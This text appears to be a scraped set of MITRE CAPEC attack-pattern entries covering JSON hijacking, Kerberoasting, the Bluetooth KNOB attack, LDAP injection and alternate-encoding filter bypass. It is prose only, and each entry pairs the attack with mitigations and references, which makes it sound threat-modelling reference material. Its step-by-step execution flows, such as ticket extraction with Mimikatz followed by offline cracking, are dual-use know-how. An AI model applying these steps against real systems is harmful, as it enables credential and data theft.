ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	605	Cellular Jamming

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Communications
Mechanisms of Attack	Manipulate System Resources

Consequences

Scope	Impact	Likelihood
Availability	Other

Related Weaknesses

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Description Summary, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-111: JSON Hijacking (aka JavaScript Hijacking)

Attack Pattern ID: 111

Abstraction: Standard

View customized information:

Description

Extended Description

An attacker gets the victim to visit their malicious page that contains a script tag whose source points to the vulnerable system with a URL that requests a response from the server containing a JSON object with possibly confidential information. The malicious page also contains malicious code to capture the JSON object returned by the server before any other processing on it can take place, typically by overriding the JavaScript function used to create new objects. This hook allows the malicious code to get access to the creation of each object and transmit the possibly sensitive contents of the captured JSON object to the attackers' server.

There is nothing in the browser's security model to prevent the attackers' malicious JavaScript code (originating from attacker's domain) to set up an environment (as described above) to intercept a JSON object response (coming from the vulnerable target system's domain), read its contents and transmit to the attackers' controlled site. The same origin policy protects the domain object model (DOM), but not the JSON.

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	212	Functionality Misuse

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Understand How to Request JSON Responses from the Target System: An attacker first explores the target system to understand what URLs need to be provided to it in order to retrieve JSON objects that contain information of interest to the attacker.

Techniques
An attacker creates an account with the target system and observes requests and the corresponding JSON responses from the server. Understanding how to properly elicit responses from the server is crucial to the attackers' ability to craft the exploit.

Experiment

Craft a malicious website:
The attacker crafts a malicious website to which they plan to lure the victim who is using the vulnerable target system. The malicious website does two things:
- 1. Contains a hook that intercepts incoming JSON objects, reads their contents and forwards the contents to the server controlled by the attacker (via a new XMLHttpRequest).
- 2. Uses the script tag with a URL in the source that requests a JSON object from the vulnerable target system. Once the JSON object is transmitted to the victim's browser, the malicious code (as described in step 1) intercepts that JSON object, steals its contents, and forwards to the attacker.
This attack step leverages the fact that the same origin policy in the browser does not protect JavaScript originating from one domain from setting up an environment to intercept and access JSON objects arriving from a completely different domain.

Exploit

Launch JSON hijack: An attacker lures the victim to the malicious website or leverages other means to get their malicious code executing in the victim's browser. Once that happens, the malicious code makes a request to the victim target system to retrieve a JSON object with sensitive information. The request includes the victim's session cookie if the victim is logged in.

Techniques
An attacker employs a myriad of standard techniques to get the victim to visit their malicious site or by some other means get the attackers' malicious code executing in the victim's browser.

Prerequisites

JSON is used as a transport mechanism between the client and the server

The target server cannot differentiate real requests from forged requests

The JSON object returned from the server can be accessed by the attackers' malicious code via a script tag

Skills Required

[Level: Medium]

Once this attack pattern is developed and understood, creating an exploit is not very complex.The attacker needs to have knowledge of the URLs that need to be accessed on the target system to request the JSON objects.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Ensure that server side code can differentiate between legitimate requests and forged requests. The solution is similar to protection against Cross Site Request Forger (CSRF), which is to use a hard to guess random nonce (that is unique to the victim's session with the server) that the attacker has no way of knowing (at least in the absence of other weaknesses). Each request from the client to the server should contain this nonce and the server should reject all requests that do not contain the nonce.

On the client side, the system's design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags).

Make the URLs in the system used to retrieve JSON objects unpredictable and unique for each user session.

Ensure that to the extent possible, no sensitive data is passed from the server to the client via JSON objects. JavaScript was never intended to play that role, hence the same origin policy does not adequate address this scenario.

Example Instances

Gmail service was found to be vulnerable to a JSON Hijacking attack that enabled an attacker to get the contents of the victim's address book. An attacker could send an e-mail to the victim's Gmail account (which ensures that the victim is logged in to Gmail when they receive it) with a link to the attackers' malicious site. If the victim clicked on the link, a request (containing the victim's authenticated session cookie) would be sent to the Gmail servers to fetch the victim's address book. This functionality is typically used by the Gmail service to get this data on the fly so that the user can be provided a list of contacts from which to choose the recipient of the e-mail.

When the JSON object with the contacts came back, it was loaded into the JavaScript space via a script tag on the attackers' malicious page. Since the JSON object was never assigned to a local variable (which would have prevented a script from a different domain accessing it due to the browser's same origin policy), another mechanism was needed to access the data that it contained. That mechanism was overwriting the internal array constructor with the attackers' own constructor in order to gain access to the JSON object's contents. These contents could then be transferred to the site controlled by the attacker.

Related Weaknesses

CWE-ID	Weakness Name
345	Insufficient Verification of Data Authenticity
346	Origin Validation Error
352	Cross-Site Request Forgery (CSRF)

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attacker_Skills_or_Knowledge_Required, Resources_Required
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Example_Instances, Execution_Flow, Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Execution_Flow

CAPEC-509: Kerberoasting

Attack Pattern ID: 509

Abstraction: Detailed

View customized information:

Description

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	652	Use of Known Kerberos Credentials
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Scan for user accounts with set SPN values
Techniques
These can be found via Powershell or LDAP queries, as well as enumerating startup name accounts and other means.
Request service tickets
Techniques
Using user account's SPN value, request other service tickets from Active Directory

Experiment

Extract ticket and save to disk
Techniques
Certain tools like Mimikatz can extract local tickets and save them to memory/disk.

Exploit

Crack the encrypted ticket to harvest plain text credentials
Techniques
Leverage a brute force application/script on the hashed value offline until cracked. The shorter the password, the easier it is to crack.

Prerequisites

The adversary requires access as an authenticated user on the system. This attack pattern relates to elevating privileges.

The adversary requires use of a third-party credential harvesting tool (e.g., Mimikatz).

The adversary requires a brute force tool.

Skills Required

[Level: Medium]

Consequences

Scope	Impact	Likelihood
Confidentiality	Gain Privileges

Mitigations

Monitor system and domain logs for abnormal access.

Employ a robust password policy for service accounts. Passwords should be of adequate length and complexity, and they should expire after a period of time.

Employ the principle of least privilege: limit service accounts privileges to what is required for functionality and no more.

Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.

Example Instances

PowerSploit's Invoke-Kerberoast module can be leveraged to request Ticket Granting Service (TGS) tickets and return crackable ticket hashes. [REF-585] [REF-586]

Related Weaknesses

CWE-ID	Weakness Name
522	Insufficiently Protected Credentials
308	Use of Single-factor Authentication
309	Use of Password System for Primary Authentication
294	Authentication Bypass by Capture-replay
263	Password Aging with Long Expiration
262	Not Using Password Aging
521	Weak Password Requirements

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1558.003	Steal or Forge Kerberos Tickets:Kerberoasting

References

[REF-559] Jeff Warren. "Extracting Service Account Passwords with Kerberoasting". 2017-05-09. <https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/>.

[REF-585] "Kerberoasting Without Mimikatz". 2016-11-01. <https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/>. URL validated: 2020-05-15.

[REF-586] "Invoke-Kerberoast". <https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/>. URL validated: 2020-05-15.

Content History

Submissions
Submission Date	Submitter	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)
Modifications
Modification Date	Modifier	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated @Status, Example_Instances, References, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Execution_Flow

CAPEC-668: Key Negotiation of Bluetooth Attack (KNOB)

Attack Pattern ID: 668

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	115	Authentication Bypass
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	20	Encryption Brute Forcing
CanFollow	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	94	Adversary in the Middle (AiTM)
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	148	Content Spoofing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Discovery: Using an established Person in the Middle setup, search for Bluetooth devices beginning the authentication process.
Techniques
Use packet capture tools.

Experiment

Change the entropy bits: Upon recieving the initial key negotiation packet from the master, the adversary modifies the entropy bits requested to 1 to allow for easy decryption before it is forwarded.

Exploit

Capture and decrypt data: Once the entropy of encryption is known, the adversary can capture data and then decrypt on their device.

Prerequisites

Person in the Middle network setup.

Skills Required

[Level: Medium]

Ability to modify packets.

Resources Required

Bluetooth adapter, packet capturing capabilities.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism
Integrity	Modify Data

Mitigations

Newer Bluetooth firmwares ensure that the KNOB is not negotaited in plaintext. Update your device.

Example Instances

Given users Alice, Bob and Charlie (Charlie being the attacker), Alice and Bob begin to agree on an encryption key when connecting. While Alice sends a message to Bob that an encryption key with 16 bytes of entropy should be used, Charlie changes this to 1 and forwards the request to Bob and continues forwarding these packets until authentication is successful.

Related Weaknesses

CWE-ID	Weakness Name
425	Direct Request ('Forced Browsing')
285	Improper Authorization
693	Protection Mechanism Failure

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1565.002	Data Manipulation: Transmitted Data Manipulation

References

[REF-657] Jovi Umawing. "Bluetooth vulnerability can be exploited in Key Negotiation of Bluetooth (KNOB) attacks". MalwareBytes. 2019-08-21. <https://blog.malwarebytes.com/awareness/2019/08/bluetooth-vulnerability-can-be-exploited-in-key-negotiation-of-bluetooth-knob-attacks/>. URL validated: 2021-06-11.

Content History

Submissions
Submission Date	Submitter	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)
Modifications
Modification Date	Modifier	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-136: LDAP Injection

Attack Pattern ID: 136

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	248	Command Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Survey application: The attacker takes an inventory of the entry points of the application.
Techniques
Spider web sites for all available links
Sniff network communications with application using a utility such as WireShark.

Experiment

Determine user-controllable input susceptible to LDAP injection: For each user-controllable input that the attacker suspects is vulnerable to LDAP injection, attempt to inject characters that have special meaning in LDAP (such as a single quote character, etc.). The goal is to create a LDAP query with an invalid syntax

Techniques
Use web browser to inject input through text fields or through HTTP GET parameters
Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header.
Use modified client (modified by reverse engineering) to inject input.

Try to exploit the LDAP injection vulnerability: After determining that a given input is vulnerable to LDAP Injection, hypothesize what the underlying query looks like. Possibly using a tool, iteratively try to add logic to the query to extract information from the LDAP, or to modify or delete information in the LDAP.

Techniques
Add logic to the LDAP query to change the meaning of that command. Automated tools could be used to generate the LDAP injection strings.
Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header.

Prerequisites

The target application must accept a string as user input, fail to sanitize characters that have a special meaning in LDAP queries in the user input, and insert the user-supplied string in an LDAP query which is then processed.

Skills Required

[Level: Medium]

The attacker needs to have knowledge of LDAP, especially its query syntax.

Consequences

Scope	Impact	Likelihood
Availability	Unreliable Execution
Integrity	Modify Data
Confidentiality	Read Data
Authorization	Execute Unauthorized Commands
Accountability Authentication Authorization Non-Repudiation	Gain Privileges
Access Control Authorization	Bypass Protection Mechanism

Mitigations

Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as LDAP content.

Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the LDAP or application.

Example Instances

PowerDNS before 2.9.18, when running with an LDAP backend, does not properly escape LDAP queries, which allows remote attackers to cause a denial of service (failure to answer ldap questions) and possibly conduct an LDAP injection attack. See also: CVE-2005-2301

Related Weaknesses

CWE-ID	Weakness Name
77	Improper Neutralization of Special Elements used in a Command ('Command Injection')
90	Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')
20	Improper Input Validation

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
29	LDAP Injection

Relevant to the OWASP taxonomy mapping

Entry Name
LDAP Injection

References

[REF-17] "WASC Threat Classification 2.0". WASC-29 - LDAP Injection. The Web Application Security Consortium (WASC). 2010. <http://projects.webappsec.org/LDAP-Injection>.

[REF-608] "OWASP Web Security Testing Guide". Testing for LDAP Injection. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Consequences
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings

CAPEC-267: Leverage Alternate Encoding

Attack Pattern ID: 267

Abstraction: Standard

View customized information:

Description

An adversary leverages the possibility to encode potentially harmful input or content used by applications such that the applications are ineffective at validating this encoding standard.

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	153	Input Data Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	3	Using Leading 'Ghost' Character Sequences to Bypass Input Filters
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	4	Using Alternative IP Address Encodings
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	43	Exploiting Multiple Input Interpretation Layers
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	52	Embedding NULL Bytes
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	53	Postfix, Null Terminate, and Backslash
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	64	Using Slashes and URL Encoding Combined to Bypass Validation Logic
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	71	Using Unicode Encoding to Bypass Validation Logic
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	72	URL Encoding
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	78	Using Escaped Slashes in Alternate Encoding
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	79	Using Slashes in Alternate Encoding
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	80	Using UTF-8 Encoding to Bypass Validation Logic
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	120	Double Encoding

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

Techniques
Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
Manually inspect the application to find entry points.

Experiment

Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the "Explore" phase as a target list and injects various payloads using a variety of different types of encodings to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.
Techniques
Try to use different encodings of content in order to bypass validation routines.

Prerequisites

The application's decoder accepts and interprets encoded characters. Data canonicalization, input filtering and validating is not done properly leaving the door open to harmful characters for the target host.

Skills Required

[Level: Low]

An adversary can inject different representation of a filtered character in a different encoding.

[Level: Medium]

An adversary may craft subtle encoding of input data by using the knowledge that they have gathered about the target host.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Authorization	Execute Unauthorized Commands
Accountability Authentication Authorization Non-Repudiation	Gain Privileges
Access Control Authorization	Bypass Protection Mechanism
Availability	Unreliable Execution Resource Consumption

Mitigations

Assume all input might use an improper representation. Use canonicalized data inside the application; all data must be converted into the representation used inside the application (UTF-8, UTF-16, etc.)

Example Instances

Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 does not properly handle unspecified "encoding strings," which allows remote adversaries to bypass the Same Origin Policy and obtain sensitive information via a crafted web site, aka "Post Encoding Information Disclosure Vulnerability." Related Vulnerabilities CVE-2010-0488

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

Related Weaknesses

CWE-ID	Weakness Name
173	Improper Handling of Alternate Encoding
172	Encoding Error
180	Incorrect Behavior Order: Validate Before Canonicalize
181	Incorrect Behavior Order: Validate Before Filter
73	External Control of File Name or Path
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
20	Improper Input Validation
697	Incorrect Comparison
692	Incomplete Denylist to Cross-Site Scripting

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1027	Obfuscated Files or Information

References

[REF-108] "WASC Threat Classification 2.0". WASC-20 - Improper Input Handling. The Web Application Security Consortium (WASC). 2010. <http://projects.webappsec.org/Improper-Input-Handling>.

[REF-109] "OWASP". Category: Encoding. The Open Web Application Security Project (OWASP). <http://www.owasp.org/index.php/Category:Encoding>.

[REF-110] "OWASP". Canonicalization, locale and Unicode. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-proactive-controls/v3/en/c4-encode-escape-data>.

[REF-69] "OWASP Cheatsheets". XSS (Cross Site Scripting) Prevention Cheat Sheet. The Open Web Application Security Project (OWASP). <https://www.owasp.org/www-community/xss-filter-evasion-cheatsheet>.

[REF-112] David Wheeler. "Secure Programming for Linux and Unix HOWTO". Chapter 5 Section 9: Character Encoding. <http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/character-encoding.html>.

[REF-113] "Wikipedia". Character encoding. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/Character_encoding>.

[REF-114] Eric Hacker. "IDS Evasion with Unicode". 2001-01-03. <http://www.securityfocus.com/infocus/1232>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description Summary, Examples-Instances, References
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Consequences
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations, Skills_Required, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Example_Instances, Execution_Flow, Skills_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-35: Leverage Executable Code in Non-Executable Files

Attack Pattern ID: 35

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	636	Hiding Malicious Data or Code within Files
PeerOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	23	File Content Injection
PeerOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	75	Manipulating Writeable Configuration Files

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Prerequisites

The attacker must have the ability to modify non-executable files consumed by the target software.

Skills Required

[Level: Low]

To identify and execute against an over-privileged system interface

Resources Required

Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
